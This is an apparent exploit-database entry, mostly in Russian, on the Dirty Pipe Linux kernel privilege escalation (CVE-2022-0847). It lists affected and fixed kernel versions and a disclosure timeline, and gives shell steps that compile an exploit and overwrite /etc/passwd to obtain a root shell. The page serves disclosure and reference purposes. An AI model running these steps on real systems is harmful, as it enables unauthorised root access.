Информация
Exploit Title: Local Privilege Escalation in Linux kernel (CVE-2022-0847)
Date: 03/07/2022
Exploit Author: Max Kellermann <[email protected]>
Tested on: ubuntu 20.04.1 LTS
Affect product:Linux kernel 5.8 or later
Fixed Product:Linux kernel 5.16.11, 5.15.25, 5.10.102
CVE ID: CVE-2022-0847
Как эксплуатировать
Тестовое окружение:

Локальное повышение привилегий
cp /etc/passwd /tmp/passwd.bak
gcc exp.c -o exp
./exp /etc/passwd 1 ootz:
su rootz
id

Ссылка
https://dirtypipe.cm4all.com/
Хронология
- 2021-04-29: первый тикет поддержки о повреждении файлов
- 2022-02-19: проблема повреждения файлов была идентифицирована как ошибка ядра Linux, которая оказалась эксплуатируемой уязвимостью
- 2022-02-20: отчёт об ошибке, эксплойт и патч отправлены команде безопасности ядра Linux
- 2022-02-21: ошибка воспроизведена на Google Pixel 6; отчёт об ошибке отправлен команде безопасности Android
- 2022-02-21: патч отправлен в LKML (без деталей уязвимости) по предложению Линуса Торвальдса, Вилли Тарро и Ала Виро
- 2022-02-23: стабильные релизы Linux с моим исправлением ошибки (5.16.11, 5.15.25, 5.10.102)
- 2022-02-24: Google объединяет моё исправление ошибки в ядро Android
- 2022-02-28: уведомил список рассылки linux-distros
- 2022-03-07: публичное раскрытие